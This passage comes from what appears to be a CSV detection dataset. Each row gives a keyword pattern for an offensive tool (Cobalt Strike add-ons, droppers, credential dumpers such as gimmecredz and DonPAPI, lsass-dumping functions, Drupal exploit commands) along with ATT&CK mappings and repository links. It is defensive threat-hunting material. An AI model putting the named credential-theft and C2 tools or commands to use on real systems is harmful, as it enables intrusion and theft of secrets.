Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*dr0op/CrossNet*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*Dr0p1t-Framework*","offensive_tool_keyword","Dr0p1t-Framework","Have you ever heard about trojan droppers ? 
In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) .)","T1203 - T1005 - T1064","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/Dr0p1t-Framework","1","1","N/A","N/A","10","1333","402","2018-11-03T19:00:12Z","2017-02-11T21:24:11Z" +"*dr4k0nia/NixImports*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*DReverseProxy.git*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*DReverseServer.go*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*drgreenthumb93/CVE-2022-30190-follina*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" +"*DriverQuery.exe no-msft*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*drk1wi/Modlishka*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*droopescan scan drupal -u * -t 32*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Droopscan*","offensive_tool_keyword","Droopscan","A plugin-based scanner to identify issues with several CMSs mainly Drupal & Silverstripe.","T1190 - T1199 - T1505 - T1210 - T1213","TA0005 - TA0009","N/A","N/A","Web Attacks","https://github.com/droope/droopescan","1","0","N/A","N/A","10","1124","248","2023-06-02T14:21:16Z","2014-10-22T22:06:30Z" +"*drop_malleable_unknown_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_with_invalid_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_without_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dropboxC2.py*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dropper_cs.exe*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" 
+"*dropper32.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*dropper64.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*drunkpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*drunkpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*drupal_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*drupwn --mode exploit --target *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Drupwn*","offensive_tool_keyword","Drupwn","Drupal Security Scanner to perform enumerations on Drupal-based web applications.","T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/immunIT/drupwn","1","0","N/A","N/A","6","543","132","2020-11-04T13:43:29Z","2018-04-04T15:13:27Z" +"*dsquery * -filter *(objectClass=trustedDomain)* -attr *","greyware_tool_keyword","dsquery","enumerate domain trusts with dsquery","T1482 - T1018","TA0007","N/A","APT41 - 
FIN8","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dswmiexec.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*dtd-finder*","offensive_tool_keyword","dtd-finder","Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.","T1221 - T1228 - T1547","TA0005 - ","N/A","N/A","Exploitation tools","https://github.com/GoSecure/dtd-finder","1","0","N/A","N/A","6","551","100","2021-09-22T17:54:08Z","2019-07-15T20:13:54Z" +"*dtmsecurity/bof_helper*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","198","44","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z" +"*dubmoat*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*Dubmoat_ExtractData*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*Dubmoat_PrintFilename*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*Dubmoat_TruncateFile*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*DueDLLigence.cs*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - 
T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence.sln*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence-master*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*dump_chrome_user*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_CREDENTIAL_MSOFFICE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_CREDENTIAL_TASKSCHEDULER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_CREDENTIAL_TSE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_domain*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*dump_firefox_user*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_jenkins*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. 
wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_keepassx*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_lsass*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*dump_lsass.js*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*dump_process(*lsass.exe*)*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*dump_sam(*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 
- T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*dump_secrets.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*dump_ssh_keys*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_tomcat*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
